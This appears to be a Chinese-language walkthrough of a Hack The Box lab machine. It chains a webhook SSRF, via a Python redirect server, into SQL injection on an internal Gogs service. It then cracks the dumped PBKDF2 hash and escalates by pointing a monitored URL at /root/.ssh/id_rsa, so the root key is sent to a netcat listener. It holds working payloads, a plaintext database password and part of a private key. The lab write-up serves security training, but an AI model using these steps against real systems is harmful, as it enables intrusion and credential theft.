一、信息收集
TARGET=10.129.179.184 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap┌──(kali㉿kali)-[~/Desktop/HTB/Health]
└─$ cat nmap_tcp_all.nmap
# Nmap 7.92 scan initiated Thu Dec 22 08:27:53 2022 as: nmap -p22,80,3000 -sC -sV -Pn -vvv -oN nmap_tcp_all.nmap 10.129.179.184
Nmap scan report for 10.129.179.184 (10.129.179.184)
Host is up, received user-set (0.23s latency).
Scanned at 2022-12-22 08:27:54 EST for 20s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 32:b7:f4:d4:2f:45:d3:30:ee:12:3b:03:67:bb:e6:31 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChNRnKkpENG89qQHjD+2Kt9H7EDTMkQpzin70Rok0geRogbYVckxywChDv3yYhaDWQ9RrsOcWLs3uGzZR9nCfXOE3uTENbSWV5GdCd3wQNmWcSlkTD4dRcZshaAoMjs1bwzhK+cOy3ZU/ywbIXdHvAz3+Xvyz5yoEnboWYdWtBNFniZ7y/mZtA/XN19sCt5PcmeY40YFSuaVy/PUQnozplBVBIN6W5gnSE0Y+3J1MLBUkvf4+5zKvC+WLqA394Y1M+/UcVcPAjo6maik1JZNAmquWWo+y+28PdXSm9F2p2HAvwJjXc96f+Fl80+P4j1yxrhWC5AZM8fNCX8FjD7Jl7
| 256 86:e1:5d:8c:29:39:ac:d7:e8:15:e6:49:e2:35:ed:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOR0vwVJwhe/5A7dkomT/li2XC2nvv6/4J6Oe8Xeyi/YQspx3RQGz3aG1sWTPstLu7yno0Z+Lk/GotRdyivSdLA=
| 256 ef:6b:ad:64:d5:e4:5b:3e:66:79:49:f4:ec:4c:23:9f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINgiR3y8U+HenhKVoN1EFipbmC6EjO3fWwWPUqa8EeJh
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-title: HTTP Monitoring Tool
3000/tcp filtered ppp no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 22 08:28:14 2022 -- 1 IP address (1 host up) scanned in 20.33 seconds
80端口没域名?
确实没。。。
先绑定域名再说
我们可以创建一个 webhook 并对其进行测试
我们要做的是向我们将设置的服务发送请求,方法是通过我们看到已过滤的端口 3000 将其重定向到它自己的本地主机,我们将通过 4444 接收响应
为此,我们将使用一个简单的脚本,该脚本在接收到某些内容时进行重定向
#!/usr/bin/python3
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler
class Redirect(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location', sys.argv[1])
self.end_headers()
HTTPServer(("0.0.0.0", 80), Redirect).serve_forever()
python3 redirect.py http://127.0.0.1:3000/
我们让 netcat 监听 4444 并使用参数 url 执行漏洞利用
nc -nvlp 4444
通过测试脚本的运行方式,它将请求重定向到您的 127.0.0.1:3000
当您发出请求时,您会将源代码发送给我们的 netcat 侦听器
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.64] from (UNKNOWN) [10.129.179.184] 55864
POST / HTTP/1.1
Host: 10.10.14.64:4444
Accept: */*
Content-type: application/json
Content-Length: 7663
Expect: 100-continue
{"webhookUrl":"http:\/\/10.10.14.64:4444\/","monitoredUrl":"http:\/\/10.10.14.64","health":"up","body":"<!DOCTYPE html>\n<html>\n\t<head data-suburl=\"\">\n\t\t<meta http-equiv=\"Content-Type\" content=\"text\/html; charset=UTF-8\" \/>\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\"\/>\n <meta name=\"author\" content=\"Gogs - Go Git Service\" \/>\n\t\t<meta name=\"description\" content=\"Gogs(Go Git Service) a painless self-hosted Git Service written in Go\" \/>\n\t\t<meta name=\"keywords\" content=\"go, git, self-hosted, gogs\">\n\t\t<meta name=\"_csrf\" content=\"5QhXwE2_RnkVeHKFb2DIwfAJa2Q6MTY3MTcxNjc3ODkwODc4OTY2Ng==\" \/>\n\t\t\n\n\t\t<link rel=\"shortcut icon\" href=\"\/img\/favicon.png\" \/>\n\n\t\t\n\t\t<link rel=\"stylesheet\" href=\"\/\/maxcdn.bootstrapcdn.com\/font-awesome\/4.2.0\/css\/font-awesome.min.css\">\n\n\t\t<script src=\"\/\/code.jquery.com\/jquery-1.11.1.min.js\"><\/script>\n\t\t\n\t\t\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/css\/ui.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/css\/gogs.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/css\/tipsy.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/css\/magnific-popup.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/fonts\/octicons.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/css\/github.min.css\">\n\n\t\t\n \t<script src=\"\/ng\/js\/lib\/lib.js\"><\/script>\n \t<script src=\"\/ng\/js\/lib\/jquery.tipsy.js\"><\/script>\n \t<script src=\"\/ng\/js\/lib\/jquery.magnific-popup.min.js\"><\/script>\n <script src=\"\/ng\/js\/utils\/tabs.js\"><\/script>\n <script src=\"\/ng\/js\/utils\/preview.js\"><\/script>\n\t\t<script src=\"\/ng\/js\/gogs.js\"><\/script>\n\n\t\t<title>Gogs: Go Git Service<\/title>\n\t<\/head>\n\t<body>\n\t\t<div id=\"wrapper\">\n\t\t<noscript>Please enable JavaScript in your browser!<\/noscript>\n\n<header id=\"header\">\n <ul class=\"menu menu-line container\" id=\"header-nav\">\n \n\n \n \n <li class=\"right\" id=\"header-nav-help\">\n <a target=\"_blank\" href=\"http:\/\/gogs.io\/docs\"><i class=\"octicon octicon-info\"><\/i> Help<\/a>\n <\/li>\n <li class=\"right\" id=\"header-nav-explore\">\n <a href=\"\/explore\"><i class=\"octicon octicon-globe\"><\/i> Explore<\/a>\n <\/li>\n \n \n <\/ul>\n<\/header>\n<div id=\"promo-wrapper\">\n <div class=\"container clear\">\n <div id=\"promo-logo\" class=\"left\">\n <img src=\"\/img\/gogs-lg.png\" alt=\"logo\" \/>\n <\/div>\n <div id=\"promo-content\">\n <h1>Gogs<\/h1>\n <h2>A painless self-hosted Git service written in Go<\/h2>\n <form id=\"promo-form\" action=\"\/user\/login\" method=\"post\">\n <input type=\"hidden\" name=\"_csrf\" value=\"5QhXwE2_RnkVeHKFb2DIwfAJa2Q6MTY3MTcxNjc3ODkwODc4OTY2Ng==\">\n <input class=\"ipt ipt-large\" id=\"username\" name=\"uname\" type=\"text\" placeholder=\"Username or E-mail\"\/>\n <input class=\"ipt ipt-large\" name=\"password\" type=\"password\" placeholder=\"Password\"\/>\n <input name=\"from\" type=\"hidden\" value=\"home\">\n <button class=\"btn btn-black btn-large\">Sign In<\/button>\n <button class=\"btn btn-green btn-large\" id=\"register-button\">Register<\/button>\n <\/form>\n <div id=\"promo-social\" class=\"social-buttons\">\n \n\n\n\n <\/div>\n <\/div> \n <\/div>\n<\/div>\n<div id=\"feature-wrapper\">\n <div class=\"container clear\">\n \n <div class=\"grid-1-2 left\">\n <i class=\"octicon octicon-flame\"><\/i>\n <b>Easy to install<\/b>\n <p>Simply <a target=\"_blank\" href=\"http:\/\/gogs.io\/docs\/installation\/install_from_binary.html\">run the binary<\/a> for your platform. Or ship Gogs with <a target=\"_blank\" href=\"https:\/\/github.com\/gogits\/gogs\/tree\/master\/dockerfiles\">Docker<\/a> or <a target=\"_blank\" href=\"https:\/\/github.com\/geerlingguy\/ansible-vagrant-examples\/tree\/master\/gogs\">Vagrant<\/a>, or get it <a target=\"_blank\" href=\"http:\/\/gogs.io\/docs\/installation\/install_from_packages.html\">packaged<\/a>.<\/p>\n <\/div>\n <div class=\"grid-1-2 left\">\n <i class=\"octicon octicon-device-desktop\"><\/i>\n <b>Cross-platform<\/b>\n <p>Gogs runs anywhere <a target=\"_blank\" href=\"http:\/\/golang.org\/\">Go<\/a> can compile for: Windows, Mac OS X, Linux, ARM, etc. Choose the one you love!<\/p>\n <\/div>\n <div class=\"grid-1-2 left\">\n <i class=\"octicon octicon-rocket\"><\/i>\n <b>Lightweight<\/b>\n <p>Gogs has low minimal requirements and can run on an inexpensive Raspberry Pi. Save your machine energy!<\/p>\n <\/div>\n <div class=\"grid-1-2 left\">\n <i class=\"octicon octicon-code\"><\/i>\n <b>Open Source<\/b>\n <p>It's all on <a target=\"_blank\" href=\"https:\/\/github.com\/gogits\/gogs\/\">GitHub<\/a>! Join us by contributing to make this project even better. Don't be shy to be a contributor!<\/p>\n <\/div>\n \n <\/div>\n<\/div>\n\t\t<\/div>\n\t\t<footer id=\"footer\">\n\t\t <div class=\"container clear\">\n\t\t <p class=\"left\" id=\"footer-rights\">\u00a9 2014 GoGits \u00b7 Version: 0.5.5.1010 Beta \u00b7 Page: <strong>1ms<\/strong> \u00b7\n\t\t Template: <strong>1ms<\/strong><\/p>\n\n\t\t <div class=\"right\" id=\"footer-links\">\n\t\t <a target=\"_blank\" href=\"https:\/\/github.com\/gogits\/gogs\"><i class=\"fa fa-github-square\"><\/i><\/a>\n\t\t <a target=\"_blank\" href=\"https:\/\/twitter.com\/gogitservice\"><i class=\"fa fa-twitter\"><\/i><\/a>\n\t\t <a target=\"_blank\" href=\"https:\/\/plus.google.com\/communities\/115599856376145964459\"><i class=\"fa fa-google-plus\"><\/i><\/a>\n\t\t <a target=\"_blank\" href=\"http:\/\/weibo.com\/gogschina\"><i class=\"fa fa-weibo\"><\/i><\/a>\n\t\t <div id=\"footer-lang\" class=\"inline drop drop-top\">Language\n\t\t <div class=\"drop-down\">\n\t\t <ul class=\"menu menu-vertical switching-list\">\n\t\t \t\n\t\t <li><a href=\"#\">English<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=zh-CN\">\u7b80\u4f53\u4e2d\u6587<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=zh-HK\">\u7e41\u9ad4\u4e2d\u6587<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=de-DE\">Deutsch<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=fr-CA\">Fran\u00e7ais<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=nl-NL\">Nederlands<\/a><\/li>\n\t\t \n\t\t <\/ul>\n\t\t <\/div>\n\t\t <\/div>\n\t\t <a target=\"_blank\" href=\"http:\/\/gogs.io\">Website<\/a>\n\t\t <span class=\"version\">Go1.3.2<\/span>\n\t\t <\/div>\n\t\t <\/div>\n\t\t<\/footer>\n\t<\/body>\n<\/html>","message":"HTTP\/1.0 302 Found","headers":{"Server":"BaseHTTP\/0.6 Python\/3.10.5","Date":"Thu, 22 Dec 2022 13:46:18 GMT","Location":"http:\/\/127.0.0.1:3000\/","Content-Type":"text\/html; charset=UTF-8","Set-Cookie":"_csrf=; Path=\/; Max-Age=0"}}
通过塑造 html 并在本地运行它,我们可以看到网络运行了一个 gogs
<!DOCTYPE html>
<html>
<head data-suburl="">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="author" content="Gogs - Go Git Service" />
<meta
name="description"
content="Gogs(Go Git Service) a painless self-hosted Git Service written in Go"
/>
<meta name="keywords" content="go, git, self-hosted, gogs" />
<meta
name="_csrf"
content="5QhXwE2_RnkVeHKFb2DIwfAJa2Q6MTY3MTcxNjc3ODkwODc4OTY2Ng=="
/>
<link rel="shortcut icon" href="/img/favicon.png" />
<link
rel="stylesheet"
href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css"
/>
<script src="//code.jquery.com/jquery-1.11.1.min.js"></script>
<link rel="stylesheet" href="/ng/css/ui.css" />
<link rel="stylesheet" href="/ng/css/gogs.css" />
<link rel="stylesheet" href="/ng/css/tipsy.css" />
<link rel="stylesheet" href="/ng/css/magnific-popup.css" />
<link rel="stylesheet" href="/ng/fonts/octicons.css" />
<link rel="stylesheet" href="/css/github.min.css" />
<script src="/ng/js/lib/lib.js"></script>
<script src="/ng/js/lib/jquery.tipsy.js"></script>
<script src="/ng/js/lib/jquery.magnific-popup.min.js"></script>
<script src="/ng/js/utils/tabs.js"></script>
<script src="/ng/js/utils/preview.js"></script>
<script src="/ng/js/gogs.js"></script>
<title>Gogs: Go Git Service</title>
</head>
<body>
<div id="wrapper">
<noscript>Please enable JavaScript in your browser!</noscript>
<header id="header">
<ul class="menu menu-line container" id="header-nav">
<li class="right" id="header-nav-help">
<a target="_blank" href="http://gogs.io/docs"
><i class="octicon octicon-info"></i> Help</a
>
</li>
<li class="right" id="header-nav-explore">
<a href="/explore"
><i class="octicon octicon-globe"></i> Explore</a
>
</li>
</ul>
</header>
<div id="promo-wrapper">
<div class="container clear">
<div id="promo-logo" class="left">
<img src="/img/gogs-lg.png" alt="logo" />
</div>
<div id="promo-content">
<h1>Gogs</h1>
<h2>A painless self-hosted Git service written in Go</h2>
<form id="promo-form" action="/user/login" method="post">
<input
type="hidden"
name="_csrf"
value="5QhXwE2_RnkVeHKFb2DIwfAJa2Q6MTY3MTcxNjc3ODkwODc4OTY2Ng=="
/>
<input
class="ipt ipt-large"
id="username"
name="uname"
type="text"
placeholder="Username or E-mail"
/>
<input
class="ipt ipt-large"
name="password"
type="password"
placeholder="Password"
/>
<input name="from" type="hidden" value="home" />
<button class="btn btn-black btn-large">Sign In</button>
<button class="btn btn-green btn-large" id="register-button">
Register
</button>
</form>
<div id="promo-social" class="social-buttons"></div>
</div>
</div>
</div>
<div id="feature-wrapper">
<div class="container clear">
<div class="grid-1-2 left">
<i class="octicon octicon-flame"></i> <b>Easy to install</b>
<p>
Simply
<a
target="_blank"
href="http://gogs.io/docs/installation/install_from_binary.html"
>run the binary</a
>
for your platform. Or ship Gogs with
<a
target="_blank"
href="https://github.com/gogits/gogs/tree/master/dockerfiles"
>Docker</a
>
or
<a
target="_blank"
href="https://github.com/geerlingguy/ansible-vagrant-examples/tree/master/gogs"
>Vagrant</a
>, or get it
<a
target="_blank"
href="http://gogs.io/docs/installation/install_from_packages.html"
>packaged</a
>.
</p>
</div>
<div class="grid-1-2 left">
<i class="octicon octicon-device-desktop"></i> <b>Cross-platform</b>
<p>
Gogs runs anywhere
<a target="_blank" href="http://golang.org/">Go</a> can compile
for: Windows, Mac OS X, Linux, ARM, etc. Choose the one you love!
</p>
</div>
<div class="grid-1-2 left">
<i class="octicon octicon-rocket"></i> <b>Lightweight</b>
<p>
Gogs has low minimal requirements and can run on an inexpensive
Raspberry Pi. Save your machine energy!
</p>
</div>
<div class="grid-1-2 left">
<i class="octicon octicon-code"></i> <b>Open Source</b>
<p>
It's all on
<a target="_blank" href="https://github.com/gogits/gogs/"
>GitHub</a
>! Join us by contributing to make this project even better. Don't
be shy to be a contributor!
</p>
</div>
</div>
</div>
</div>
<footer id="footer">
<div class="container clear">
<p class="left" id="footer-rights">
\u00a9 2014 GoGits \u00b7 Version: 0.5.5.1010 Beta \u00b7 Page:
<strong>1ms</strong> \u00b7 Template: <strong>1ms</strong>
</p>
<div class="right" id="footer-links">
<a target="_blank" href="https://github.com/gogits/gogs"
><i class="fa fa-github-square"></i
></a>
<a target="_blank" href="https://twitter.com/gogitservice"
><i class="fa fa-twitter"></i
></a>
<a
target="_blank"
href="https://plus.google.com/communities/115599856376145964459"
><i class="fa fa-google-plus"></i
></a>
<a target="_blank" href="http://weibo.com/gogschina"
><i class="fa fa-weibo"></i
></a>
<div id="footer-lang" class="inline drop drop-top">
Language
<div class="drop-down">
<ul class="menu menu-vertical switching-list">
<li><a href="#">English</a></li>
<li><a href="/?lang=zh-CN">\u7b80\u4f53\u4e2d\u6587</a></li>
<li><a href="/?lang=zh-HK">\u7e41\u9ad4\u4e2d\u6587</a></li>
<li><a href="/?lang=de-DE">Deutsch</a></li>
<li><a href="/?lang=fr-CA">Fran\u00e7ais</a></li>
<li><a href="/?lang=nl-NL">Nederlands</a></li>
</ul>
</div>
</div>
<a target="_blank" href="http://gogs.io">Website</a>
<span class="version">Go1.3.2</span>
</div>
</div>
</footer>
</body>
</html>
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─# searchsploit gogs
---------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gogs - 'label' SQL Injection | multiple/webapps/35237.txt
Gogs - 'users'/'repos' '?q' SQL Injection | multiple/webapps/35238.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
在使用 poc 枚举之后,我们可以将重定向更改为我们的有效载荷
python3 redirect.py "http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--"继续操作
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.64] from (UNKNOWN) [10.129.179.184] 48514
POST / HTTP/1.1
Host: 10.10.14.64:4444
Accept: */*
Content-type: application/json
Content-Length: 834
{"webhookUrl":"http:\/\/10.10.14.64:4444\/","monitoredUrl":"http:\/\/10.10.14.64","health":"up","body":"{\"data\":[{\"username\":\"susanne\",\"avatar\":\"\/\/1.gravatar.com\/avatar\/c11d48f16f254e918744183ef7b89fce\"},{\"username\":\"66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37\",\"avatar\":\"\/\/1.gravatar.com\/avatar\/1\"}],\"ok\":true}","message":"HTTP\/1.0 302 Found","headers":{"Server":"BaseHTTP\/0.6 Python\/3.10.5","Date":"Thu, 22 Dec 2022 14:00:01 GMT","Location":"http:\/\/127.0.0.1:3000\/api\/v1\/users\/search?q=')\/**\/union\/**\/all\/**\/select\/**\/1,1,(select\/**\/passwd\/**\/from\/**\/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--","Content-Type":"application\/json; charset=UTF-8","Set-Cookie":"_csrf=; Path=\/; Max-Age=0","Content-Length":"264"}}
通过调整正文部分,我们可以在用户名字段中看到用户 susanne,在第二个用户名中也可以看到所选密码字段的内容
https://toolgg.com/json-beautifier.html
{
"webhookUrl": "http://10.10.14.64:4444/",
"monitoredUrl": "http://10.10.14.64",
"health": "up",
"body": "{\"data\":[{\"username\":\"susanne\",\"avatar\":\"//1.gravatar.com/avatar/c11d48f16f254e918744183ef7b89fce\"},{\"username\":\"66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37\",\"avatar\":\"//1.gravatar.com/avatar/1\"}],\"ok\":true}",
"message": "HTTP/1.0 302 Found",
"headers": {
"Server": "BaseHTTP/0.6 Python/3.10.5",
"Date": "Thu, 22 Dec 2022 14:00:01 GMT",
"Location": "http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--",
"Content-Type": "application/json; charset=UTF-8",
"Set-Cookie": "_csrf=; Path=/; Max-Age=0",
"Content-Length": "264"
}
}{
"username": "susanne",
"avatar": "//1.gravatar.com/avatar/c11d48f16f254e918744183ef7b89fce",
"username": "66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37",
"avatar": "//1.gravatar.com/avatar/1"
}
我们将做完全相同的事情,但更改 salt 字段的 passwd 字段
python3 redirect.py "http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/salt/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--"
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.64] from (UNKNOWN) [10.129.179.184] 44608
POST / HTTP/1.1
Host: 10.10.14.64:4444
Accept: */*
Content-type: application/json
Content-Length: 742
{"webhookUrl":"http:\/\/10.10.14.64:4444\/","monitoredUrl":"http:\/\/10.10.14.64","health":"up","body":"{\"data\":[{\"username\":\"susanne\",\"avatar\":\"\/\/1.gravatar.com\/avatar\/c11d48f16f254e918744183ef7b89fce\"},{\"username\":\"sO3XIbeW14\",\"avatar\":\"\/\/1.gravatar.com\/avatar\/1\"}],\"ok\":true}","message":"HTTP\/1.0 302 Found","headers":{"Server":"BaseHTTP\/0.6 Python\/3.10.5","Date":"Thu, 22 Dec 2022 14:04:39 GMT","Location":"http:\/\/127.0.0.1:3000\/api\/v1\/users\/search?q=')\/**\/union\/**\/all\/**\/select\/**\/1,1,(select\/**\/salt\/**\/from\/**\/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--","Content-Type":"application\/json; charset=UTF-8","Set-Cookie":"_csrf=; Path=\/; Max-Age=0","Content-Length":"174"}}
{
"webhookUrl": "http://10.10.14.64:4444/",
"monitoredUrl": "http://10.10.14.64",
"health": "up",
"body": "{\"data\":[{\"username\":\"susanne\",\"avatar\":\"//1.gravatar.com/avatar/c11d48f16f254e918744183ef7b89fce\"},{\"username\":\"sO3XIbeW14\",\"avatar\":\"//1.gravatar.com/avatar/1\"}],\"ok\":true}",
"message": "HTTP/1.0 302 Found",
"headers": {
"Server": "BaseHTTP/0.6 Python/3.10.5",
"Date": "Thu, 22 Dec 2022 14:04:39 GMT",
"Location": "http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/salt/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--",
"Content-Type": "application/json; charset=UTF-8",
"Set-Cookie": "_csrf=; Path=/; Max-Age=0",
"Content-Length": "174"
}
}通过整形我们还可以在第二个用户名字段中看到 salt 的值
{
"username": "susanne",
"avatar": "//1.gravatar.com/avatar/c11d48f16f254e918744183ef7b89fce",
"username": "sO3XIbeW14",
"avatar": "//1.gravatar.com/avatar/1"
}可以找到用户名和凭证哈希
susanne:66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37
salt:sO3XIbeW14
根据源代码,哈希函数是pbkdf2
PBKDF2([]byte(u.Passwd), []byte(u.Salt), 10000, 50, sha256.New)
password, salt []byte, iter, keyLen int, h func() hash.Hash检查 hashcat 文档格式,https://hashcat.net/wiki/doku.php?id=example_hashes
sha256:1000:MTc3MTA0MTQwMjQxNzY=:PYjCU215Mi57AYPKva9j7mvF4Rc5bCnt
请注意,凭据哈希正是凭据哈希的十六进制表示。所以,我们需要先将其转换为对应的字节形式/ 哈希应该排列为
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─# echo 'sha256:10000:'$(echo 'sO3XIbeW14' | base64 | cut -c1-14)':'$(echo '66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37' | xxd -r -p | base64)
sha256:10000:c08zWEliZVcxNA:ZsB0ZFVFeB8QZPt/0Rd0U9uPDKLOWKnYHAS+Lm07oqDWwDLw/U74P0jXQ0nsGW9O/jc=
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─#
使用这种格式,我们可以很容易地用 hashcat 和 rockyou.txt 破解它
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─# hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt --show
sha256:10000:c08zWEliZVcxNA:ZsB0ZFVFeB8QZPt/0Rd0U9uPDKLOWKnYHAS+Lm07oqDWwDLw/U74P0jXQ0nsGW9O/jc=:february15
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─#
february15
我们可以使用用户 susanne 通过 ssh 连接密码
ssh susanne@10.129.179.184
三、提权
https://github.com/DominicBreuker/pspy
2022/12/22 14:34:01 CMD: UID=0 PID=3707 | /bin/bash -c cd /var/www/html && php artisan schedule:run >> /dev/null 2>&1
2022/12/22 14:34:01 CMD: UID=0 PID=3710 | grep columns
2022/12/22 14:34:01 CMD: UID=0 PID=3708 | sh -c stty -a | grep columns
2022/12/22 14:34:01 CMD: UID=0 PID=3711 | sh -c stty -a | grep columns
2022/12/22 14:34:01 CMD: UID=0 PID=3713 | grep columns
2022/12/22 14:34:06 CMD: UID=0 PID=3716 | mysql laravel --execute TRUNCATE tasks
所以,原则上,我们可以创建一个新的任务,并更新数据库中的任务内容,使其加载本地文件,例如/root/.ssh/id_rsa。
此外,在Web文件中,我们发现
发送您从MonitorDurl读取的内容,我们有凭据可以从MySQL更改
susanne@health:/var/www/html/app/Http/Controllers$ cat HealthChecker.php | grep file -A8 -B4
$json = [];
$json['webhookUrl'] = $webhookUrl;
$json['monitoredUrl'] = $monitoredUrl;
$res = @file_get_contents($monitoredUrl, false);
if ($res) {
if ($onlyError) {
return $json;
}
$json['health'] = "up";
$json['body'] = $res;
susanne@health:/var/www/html/app/Http/Controllers$
本地开启监听
nc -nvlp 80我们定义了一个新的webhook指向我们的主机,这次我们给create
我们连接到mysql,并将monitoredUrl的值更改为根id_rsa
susanne@health:/var/www/html/app/Http/Controllers$ mysql -Dlaravel -ularavel -pMYsql_strongestpass@2014+
mysql: [Warning] Using a password on the command line interface can be insecure.
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 168
Server version: 5.7.39-0ubuntu0.18.04.2 (Ubuntu)
Copyright (c) 2000, 2022, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> update tasks set monitoredUrl='file:///root/.ssh/id_rsa';
Query OK, 0 rows affected (0.00 sec)
Rows matched: 0 Changed: 0 Warnings: 0
mysql>
等待几秒钟,我们从netcat监听器接收到id_rsa数据
┌──(root㉿kali)-[/home/kali/Desktop/HTB/Health]
└─# nc -nvlp 80
listening on [any] 80 ...
connect to [10.10.14.64] from (UNKNOWN) [10.129.179.184] 45022
POST / HTTP/1.1
Host: 10.10.14.64
Accept: */*
Content-type: application/json
Content-Length: 1829
Expect: 100-continue
{"webhookUrl":"http:\/\/10.10.14.64\/","monitoredUrl":"file:\/\/\/root\/.ssh\/id_rsa","health":"up","body":"-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAwddD+eMlmkBmuU77LB0LfuVNJMam9\/jG5NPqc2TfW4Nlj9gE\nKScDJTrF0vXYnIy4yUwM4\/2M31zkuVI007ukvWVRFhRYjwoEPJQUjY2s6B0ykCzq\nIMFxjreovi1DatoMASTI9Dlm85mdL+rBIjJwfp+Via7ZgoxGaFr0pr8xnNePuHH\/\nKuigjMqEn0k6C3EoiBGmEerr1BNKDBHNvdL\/XP1hN4B7egzjcV8Rphj6XRE3bhgH\n7so4Xp3Nbro7H7IwIkTvhgy61bSUIWrTdqKP3KPKxua+TqUqyWGNksmK7bYvzhh8\nW6KAhfnHTO+ppIVqzmam4qbsfisDjJgs6ZwHiQIDAQABAoIBAEQ8IOOwQCZikUae\nNPC8cLWExnkxrMkRvAIFTzy7v5yZToEqS5yo7QSIAedXP58sMkg6Czeeo55lNua9\nt3bpUP6S0c5x7xK7Ne6VOf7yZnF3BbuW8\/v\/3Jeesznu+RJ+G0ezyUGfi0wpQRoD\nC2WcV9lbF+rVsB+yfX5ytjiUiURqR8G8wRYI\/GpGyaCnyHmb6gLQg6Kj+xnxw6Dl\nhnqFXpOWB771WnW9yH7\/IU9Z41t5tMXtYwj0pscZ5+XzzhgXw1y1x\/LUyan++D+8\nefiWCNS3yeM1ehMgGW9SFE+VMVDPM6CIJXNx1YPoQBRYYT0lwqOD1UkiFwDbOVB2\n1bLlZQECgYEA9iT13rdKQ\/zMO6wuqWWB2GiQ47EqpvG8Ejm0qhcJivJbZCxV2kAj\nnVhtw6NRFZ1Gfu21kPTCUTK34iX\/p\/doSsAzWRJFqqwrf36LS56OaSoeYgSFhjn3\nsqW7LTBXGuy0vvyeiKVJsNVNhNOcTKM5LY5NJ2+mOaryB2Y3aUaSKdECgYEAyZou\nfEG0e7rm3z++bZE5YFaaaOdhSNXbwuZkP4DtQzm78Jq5ErBD+a1af2hpuCt7+d1q\n0ipOCXDSsEYL9Q2i1KqPxYopmJNvWxeaHPiuPvJA5Ea5wZV8WWhuspH3657nx8ZQ\nzkbVWX3JRDh4vdFOBGB\/ImdyamXURQ72Xhr7ODkCgYAOYn